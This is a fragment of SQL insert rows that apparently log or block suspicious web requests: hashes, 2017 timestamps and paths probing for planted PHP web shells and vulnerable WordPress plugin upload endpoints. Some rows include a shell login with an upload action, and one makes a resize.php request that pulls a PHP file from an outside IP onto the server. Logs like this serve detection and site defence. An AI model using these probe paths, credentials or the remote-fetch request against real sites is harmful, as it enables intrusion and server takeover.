(0xe78bdb459105d74fc10be2ffcc18b10c, 1492996241, '/priv.php'),
(0x6b35a654c40b0384a164c169a2bd80d9, 1492996244, '/form.php'),
(0xac73e23bc6d39aba341ad02cc5256aea, 1492996245, '/wrm.php'),
(0x2a702b0e042dce4d0cfecbd5590454b8, 1492996252, '/Leonas.php'),
(0xb3efab2fb21edfe34a7eef9b9e77ddad, 1492996260, '/cox.php'),
(0x08e7898641df7e712012567de094efb5, 1492996261, '/fozi.php'),
(0xb2a90acbafbbb6a4604571ae0053487d, 1492996263, '/cv.php'),
(0xdad1cfd72c71c00aee7afb7af1b64cb7, 1492996264, '/wss.php'),
(0x5d5f59b71a778659c0e2d13da6181166, 1492996274, '/Mamha.php'),
(0x7e69720249f1492c470c9db94fb667c9, 1493014490, '/wp-content/plugins/stats-counter/img/icon.png'),
(0x49e132e62671a262920a7bfd707accaf, 1493155869, '/wp-content/uploads/wpcf7_captcha/689312643.png'),
(0xe3f291e2973c93b8024f122617185497, 1493171708, '/wp-content/plugins/formcraft/file-upload/server/content/'),
(0xd57dfb9a4f8cbb7bc7f227d193354b63, 1493259548, '/wp-content/plugins/fluid_forms/file-upload/server/content/'),
(0x34c40c2c87f44bf8fe3da56047b47403, 1493392803, '/abpout'),
(0x052769a701d8a9ccd390387c9dc1d438, 1493395194, '/wp-content/themes/synoptic/style.css'),
(0x8d07482c7919f176c6c8b6d45cca4526, 1493463276, '/wp-content/plugins/gravityforms/css/preview.css'),
(0xe12d27f23091e3216558ab882fe90188, 1493752299, '/Iontrol.php'),
(0xb8b323f841e9e8c1738a42182490c997, 1493763610, '/wp-includes/css/hi.php?0=1'),
(0xff379926dff05a2239269f18fd08cadb, 1493784451, '/imdex.php'),
(0x5c361bc2b94969abd8e82f71cd19cd0d, 1493801201, '/webconfig.txt.php'),
(0x069115fd66c2c48855977064fa961007, 1493815571, '/les-seances-n%3C%21DOCTYPE%20html%20PUBLIC'),
(0x88ce0184a525d82e959f40ddc5edd0b8, 1493817912, '/script.php'),
(0x4c72b7071a1f66614e91954132564184, 1493830400, '/wp-content/up.php'),
(0xd03f7db95a6eca3faca739c0495a44d3, 1493879719, '/xmirpc.php?u=1'),
(0x0df09f4b0f6707cf2f7e77f5358f1c03, 1493902066, '/wp-includes/css/upload.php'),
(0x7148ddad13cc99953d0be73172c2444d, 1493948114, '/ghfhvvaw.php'),
(0xdcd3cb8f1451d6c65e964ac6d4525198, 1493984312, '/hivcxa.php'),
(0x9eda5b18617853f303c7b9795017aedc, 1494002177, '/wp-content/plugins/woocommerce-catalog-enquiry/lib/jquery/upload/media-upload.js'),
(0xbcc9911f06c94198ef1c226d13c77d38, 1494094608, '/wp-includes/pomo/w7388n.php'),
(0x06793d27c0ac6c3608c7d09fb610c69a, 1494180531, '/mobile_detect.php'),
(0x886931eb498353dce98c50e874374d41, 1494247349, '/wp-includes/pomo/7313581d9a.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x239a785171f8495a0fa1621fd64d460d, 1494368590, '/images/xxu.php'),
(0x7f9a10d16180bd722d9efad7c0a6b9af, 1494368591, '/x.php'),
(0x3d0cbefbd6bc6efcb00dc7227a81a490, 1494368592, '/images/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x973a85c6f2a32ec5128d12b8c527db0e, 1494368626, '/sqlbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb8f89d8b5147f1bb75cb631f40469d27, 1494368657, '/email.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x9651acbad80de27a384124eb8161acbb, 1494368678, '/functions.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x9bff7711eb994d96ea10a616f3e612e5, 1494368699, '/logs.asp?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xbb51b54585d0aefbd498376437c1b940, 1494368719, '/cache/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xc4742ac0f3c70d6129b72ac6e36209a4, 1494368739, '/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x1691bac70591ef8db8fc9c26694c068e, 1494368768, '/shootme.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x41f38ca402258e65e6d703ab5fd20e87, 1494368803, '/configurationbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb37b280f410345b1274fb54e248aef2a, 1494368841, '/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x75080563602ecef2e5a7d0dbbaa25396, 1494368865, '/jconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x71bcbbae326b97338f2fb31eb0c75b0f, 1494368901, '/media/reads.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0x5f5d60806b2714dc36fddad1f81d0455, 1494368944, '/media/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0xa8471c0f9c910ad62506f45423d96712, 1494368987, '/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5ae5cca6ea001dd62b3a2f554b1ea3b1, 1494369044, '/images/laj.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xb390ac5b1730c0f2a854df597ac9e24f, 1494369079, '/media/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0xc22d7bafef930379f1685d3b5a863afb, 1494369109, '/media/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0x0553ddd7f0fdf37df1cc83a0daf1da81, 1494369172, '/r3x.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xf237af750bd08a9bdec6cb6a0b58383a, 1494369205, '/log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x47f10de3a0a0759f829adacbc935cdef, 1494369240, '/images/stories/0day.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d'),
(0x234bfaa849eda6dfce3f3accf40b3e84, 1494369259, '/includes/u2p.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2luY2x1ZGVzLw%3d%3d'),
(0x868f01368628eeaff0e35eb1eec626b0, 1494369287, '/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xbd89af56f344e3ae39f8de221945b154, 1494369316, '/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x39406a4718b695fa721a59bf2491c659, 1494369342, '/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x4ce5aa01e9a24cfebe72d0c806b46f93, 1494369363, '/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc77b1a32fb0b80f0591207d101efd6e8, 1494369378, '/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d'),
(0x84013b8b95bc7e593713858f770898dd, 1494369409, '/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb6b757b9af10afa58baced33fe37580f, 1494369418, '/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xe638cf649c3ca35fa2ce88f11bc5fefe, 1494369455, '/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc54d404ca4bd7d319e49e55630256128, 1494369481, '/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d'),
(0x9f9fb0d714ff3cf24bc721c587ff7a71, 1494369518, '/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xbb8d86309ed9b802f417165620e1a0cd, 1494369543, '/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc04b5babd1115fed3df835f8fb8f7db9, 1494369577, '/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5ccc5c1cb31215577c7a5fe000cd36dd, 1494369601, '/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x012f72312d01bae2194ca7ecbe0d0b1d, 1494369632, '/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x334e78b61208de34a9293b2a010eff97, 1494369647, '/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5562b8e3d1d57f761af7d2fd07c759b2, 1494369662, '/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0xb768e68a78240284c698ac5c2468e55a, 1494369676, '/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x6b00e77f5319fd1ca6863598915e04ac, 1494369703, '/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xe5b6e5c2accd4bccc520844b98b81674, 1494369714, '/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0x6f6e832336f30adbf2043c2f8d9638b2, 1494369741, '/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0x633d5fea66c73ac696dacef379bf60a5, 1494369770, '/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x22c36e5bb2837f9688c8bdd78aa43820, 1494369796, '/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x3e03d120c6346e0e6ba90d0584d15021, 1494369816, '/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xd996cba03ab077309a17137def18927d, 1494369838, '/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x7027bbf62268bbbe5e6e3010187f6015, 1494369843, '/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x2b9a2647e96c0662ee1c2c1a0d957071, 1494369866, '/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xff5d0e66d4b90691ac212c18808fb445, 1494369878, '/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x342a0ce1bcd6454d482279cfac7e55eb, 1494369898, '/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x1363c57d31eb7236c18bd1fd8f29fea2, 1494369920, '/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x48459356ff5ba4ed27029cc26eb78a94, 1494369965, '/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x2f54cd80e534bac17d7e874b807de428, 1494370007, '/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x53e7a6d7def29bcc34386e8333cba7ec, 1494370048, '/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xe708dc5d07f67766bfa58284b0367b76, 1494370077, '/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xe6fa28b4ffa816130541bbb60aec85e8, 1494370097, '/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xc37db3dfdf4196df1bd452c2570a13f3, 1494370128, '/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc8424b31510804ba1ff7076809fb30c0, 1494370159, '/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x360933872199e2717177dcd03793df87, 1494370189, '/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x6b44aeb62168556fc6f0d679c204dd83, 1494370222, '/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x366b9bf044acc01749b58d42608ccb5e, 1494370235, '/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d'),
(0xc663ddadcb5d6d0107f9b096ce4228cb, 1494370268, '/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv'),
(0x4bf8b4c8e52287f6778e2003dcea9438, 1494370291, '/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x46521056c33ba1a90a83e159a1ee86e5, 1494370318, '/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x88661b6775d370ccdbac5897f27ad673, 1494370335, '/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x60d4e38b8aab0bd38a8bdecb8ea79c40, 1494370370, '/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x902c3dd64e845f1fc07c3987437f3753, 1494370401, '/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x1a1a5512e2b4f91855f6e0a2ff557b85, 1494370420, '/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x942172a3443d30ab918d6b22e3cf8ce2, 1494370441, '/wp-content/uploads/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8%3d'),
(0x114adccbe44d44804c341abcf4b8ca70, 1494370468, '/wp-content/plugins/myshe.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xb7128b935ef196f89dd5f4484a858f83, 1494370481, '/wp-content/plugins/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x290ae393533edb2c5e0ec67546714196, 1494370508, '/wp-content/plugins/wp-footers.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xe799c0035ced284d759e8e6f3778f865, 1494370516, '/wp-content/plugins/wpfootes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xadf9feedd7a495d39a2aeee45df857ac, 1494370525, '/wp-content/plugins/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x468c04df0739201f32462a0dc92c0767, 1494370529, '/wp-content/plugins/SocketIontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x6f90ac4dbcf1b686d9b0dfd7d79684f2, 1494370568, '/wp-content/plugins/SocketIasrgasfontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x5ec2fdca98894c851acfcaa1d0fd8650, 1494370579, '/configurationbak.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xa8ebf090b0310ad1c403a05247676bd1, 1494370601, '/wp-content/plugins/Analyser.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xfc58b891731c28882d14e7b46de68857, 1494370622, '/cache/list.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xdc892b6aa76754fb74b5e4747fae668a, 1494370634, '/license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x0f6b3de9b5485f74abf1e136906e0cf6, 1494370643, '/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xdd713979fa601b51f5b5ed27e1fd0c7e, 1494370645, '/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x76a2e0ac71d11af10d050317f3b2d46c, 1494370651, '/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf42c57e17432f4a60efe7f7828754a05, 1494370660, '/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x72eb35aa70f8fb594a0a286d6e130b15, 1494370662, '/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x17868cc901368cbdc9035db18ec78c05, 1494370665, '/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x46475fa46849e880fd57b34357dcd687, 1494370670, '/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe2346b08e2ec5301dd82720a03e52cba, 1494370673, '/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xc8ba9c0dabecdcda0702e0b6a5082236, 1494370674, '/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xd20975b2c839c10b4d1deb20825d9815, 1494370683, '/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xa4bbb5c21494b67291e756f96e0fae83, 1494370688, '/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x2c5a974e834cee95a18800b00e1a7ebf, 1494370692, '/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x47969a33460b10f16ec87ea3a8b7f663, 1494370702, '/libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe4b5afcb9dd80ba8e9ba2aec3c72076b, 1494370710, '/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x6e6709db1e933de04d9442b4669b805b, 1494370720, '/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf94ca44cfcdc9fb89002fd7c23ed5061, 1494370729, '/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x15d2bb054df105ff575da84c1b4b3dc7, 1494370741, '/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xb27f6d1611cc412c63a7e2647d8c325d, 1494370750, '/images/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x35b91e04b7fd70ec2bd7e94b2d126e12, 1494370755, '/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x11bee8c3bd7db31866f14526e2a578d8, 1494370761, '/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xc84df53d09629678d76b31ad36e36ab6, 1494370767, '/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xd2b85f5b02490bdcc72526635557ea31, 1494370773, '/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xce7206fe71b4dbf577c8fc4745630566, 1494370774, '/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xa176db1e76bbd7853cfdf055d2488496, 1494370780, '/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x2c1eaad29b3ad068dd8932339d439fa0, 1494370794, '/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x043e9be7699540dff817055365758c82, 1494370802, '/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x8f2987ad56e6dfbfc5a8a8da8d2576af, 1494371169, '/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x0bc2ea3bb495691ecb2c56a678c721bc, 1494371177, '/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe67b2ecad4f98fbaa1c3483f7e8b09dc, 1494371185, '/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf50522df14907a55123d206aedf13173, 1494371190, '/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x95b500fe1349e59b2935d2eb939d2cc4, 1494483855, '/xmlrpc-blog.php'),
(0xa4032a487d033b5a8ee26b3244d1f2b4, 1494526827, '/customizer.php'),
(0xe8119f053a6c689a0e8b4cbb5ab1c561, 1494581761, '/wp-logs.php?action=test'),
(0x418606bfe7113d69b272d7f247c60594, 1494647531, '/wp-includes/css/style.css.php'),
(0x3fb618909cee081d2ebcc0bdfe3ed385, 1494727657, '/wp-content/uploads/2015/09/class-wp-upgrade.php'),
(0x696710168bec4862dc311c3736705561, 1494767536, '/cash.php'),
(0x9bb9d63c0d938aef80cb2047515f3d7a, 1494767539, '/cssf.php'),
(0x7554b6e76df18aacc0abc80335c74485, 1494767542, '/3caa.php'),
(0x44837ea02dc0e761113e0e7621bbca48, 1494767549, '/read.php'),
(0x58f0d5eca3916b1a2ffbccd73be61a1a, 1494767550, '/spy.php'),
(0xb8994bbb81d57d02c1f3343b7197e9fe, 1494767557, '/Matun.php'),
(0x2d48d9894c7e3d6e73194917bb4d0ec0, 1494767561, '/Ehxjfhv.php'),
(0x67804ea7728123367e244d502918c85b, 1494767565, '/ms-media.php'),
(0xb03fab2a1f1c0abe4df0597ebd26f9cd, 1494767568, '/Mydsvx.php'),
(0xd3eaa87f883572381cacf59c4a773fa1, 1494767583, '/wp-lop.php'),
(0xb5d35465ce9f2ba9422e39dc19993e18, 1494767585, '/Gmdrdtfh.php'),
(0x89cca595d4067119261645f4028fc574, 1494767588, '/c.php'),
(0xc4f6a4eae82f63c731b824a265715f32, 1494767589, '/wdphhaut.php'),
(0x273b321c33dea3523139acfd679af052, 1494791265, '/wp-content/plugins/revslider/temp/'),
(0xc4e8546fe53bec2bc14a388f8a734992, 1494815602, '/wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js'),
(0xd0a53a3ce9abbfbd304e782f43205fa0, 1495490056, '/infos.php'),
(0x47e194b6ee611b0a900e882435e36795, 1495536195, '/eg.php'),
(0xdcd7f9a36e62597dd27222901d8b9c2d, 1495706633, '/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/'),
(0x32d6d1d2bf9369b2aae2ae06a32137d4, 1495712569, '/cdg.php'),
(0xc562609e38067ebff65aaab21f185390, 1495746816, '/wp-includes/Text/Temp.php'),
(0xd8b9539b3d936874254f445a723d6ade, 1495746816, '/wp-content/themes/gray-whale/db.php'),
(0x7b56892d06e7033828476b9b70ca5e8a, 1495746816, '/wp-includes/cache-template.php'),
(0xa7e98bc5e5eb5498f124f25e97088082, 1495746816, '/wp-admin/ms-head.php'),
(0xa6ad53ac49ab67b853b3ad16ba953cfb, 1495746816, '/wp-content/themes/theme/info.php'),
(0x4b56f0aea5f1bb09885d2e8ace4dfe8b, 1495746816, '/wp-includes/Text/Diff/class.php'),
(0x701c468114e315642b9a465355681d04, 1495847727, '/web/wp-admin/setup-config.php?step=1'),
(0x4747f3c8f9bf66be04c3382248f5d7bf, 1495847955, '/news/wp-admin/setup-config.php?step=1'),
(0xb4e656bfcee4221a6b584325f97bba30, 1495850718, '/wp-content/plugins/wysija-newsletters/readme.txt'),
(0xdfcc052ae0c183e82abcf82adcf80a49, 1495879501, '/wp-content/eg.php'),
(0x5799dfc5f4d81d9db3e5c3a4a8f5b97d, 1495927583, '/assets/images/iran78fzfzz.php'),
(0xef4cfe0ffcc2352d9179e7df45296941, 1495928434, '/assets/b374k-2.8.php'),
(0x7196ac9d1fcc4d45e5051df32fe8777b, 1495972784, '/wp-content/plugins/newsletter/js/Chart.min.js'),
(0xc4547fa84d4f6b12b75811a8f03e849b, 1495982160, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://91.103.217.68/~kettfusion/wp-content/redux/cache.php'),
(0x1b63de66af13ba498ea16b6584401ea1, 1495982161, '/wp-content/plugins/wp-mobile-detector/cache/cache.php'),
(0xcf3008211caacf3b700f4c003bf6ef6a, 1495982162, '/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php'),
(0xc335a1e598894b4a212e4cf87c821c67, 1496013525, '/wp-content/plugins/flash-album-gallery/admin/css/flagSorter.css'),
(0x0ab32de6fcb3cf54da9df97e0edf84b7, 1496057541, '/wordpress/wp-admin/setup-config.php?step=1'),
(0xebe5a416122e4b4926cc46e689e9e617, 1496057843, '/test/wp-admin/setup-config.php?step=1'),
(0x8019da2216205f3d1da362833f45b19d, 1496058174, '/blog/wp-admin/setup-config.php?step=1'),
(0xb5bee1cc10d48a509396858faa63e77e, 1496060007, '/home/wp-admin/setup-config.php?step=1'),
(0x357692e28515f3ec7d3124f7cb1e46fa, 1496061060, '/wp/wp-admin/setup-config.php?step=1'),
(0xdc2d05729b44f863f5493042ed78f47d, 1496061861, '/new/wp-admin/setup-config.php?step=1'),
(0x092be86776913f385adf53e69affb504, 1496062410, '/cms/wp-admin/setup-config.php?step=1'),
(0xdfaa4db1d7627614a4bd09c42cad0e1e, 1496065151, '/main/wp-admin/setup-config.php?step=1'),
(0x3fb46a057a17d9346a9dca73ba7b7fcf, 1496070316, '/en/wp-admin/setup-config.php?step=1'),
(0x36feaad859eb274b77c5a6394da09b18, 1496248937, '/wp-content/plugins/zen-mobile-app-native/server/images.php'),
(0xbdbb0cccfeecf6291f0dbea3e1c01493, 1496248938, '/wp-content/plugins/webapp-builder/server/images.php'),
(0x3ade0f8dcc71913129660fd6176f38ab, 1496248939, '/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php'),
(0xaccc18c3f9ba5af1299d71525d8f33cd, 1496248940, '/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php'),
(0xd8cc2f690b88b93fd32ac102b58a6a8c, 1496248941, '/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php'),
(0x34b33e8b8be42efc30fe17668309bb9b, 1496248941, '/wp-content/plugins/cysteme-finder/php/connector.php?wphome=./'),
(0x34faf681e107fc32320b833fbc252852, 1496407772, '/wp-pols.php'),
(0xaedbce0ac7baad473d91a1a2922f16dc, 1496440992, '/wp-content/plugins/etc.php'),
(0xbe3d0e1464cd95e1bf0d14b78b4682d5, 1496445236, '/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected'),
(0x49a006628df51974a5d17101c43b15ff, 1496449481, '/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php'),
(0x16b48f40bc375c35376b2b19a52a235e, 1496449789, '/wp-includes/class-wp-contact.php'),
(0x3a27b658e814c976528f056cc5322ad4, 1496458420, '/wp-content/themes/kuma/db.php'),
(0xe95739bdd7303a54daebf7c49625b7d0, 1496458565, '/wp-content/plugins/js_composer/vendor/composer/config.php'),
(0x01f282fd457ef0e6b1a0310f4e56c035, 1496462618, '/wp-content/uploads/etc.php'),
(0x83b6ce241045cd33a95a629f4f3a24f7, 1496466884, '/wp-content/themes/kuma/figure.php'),
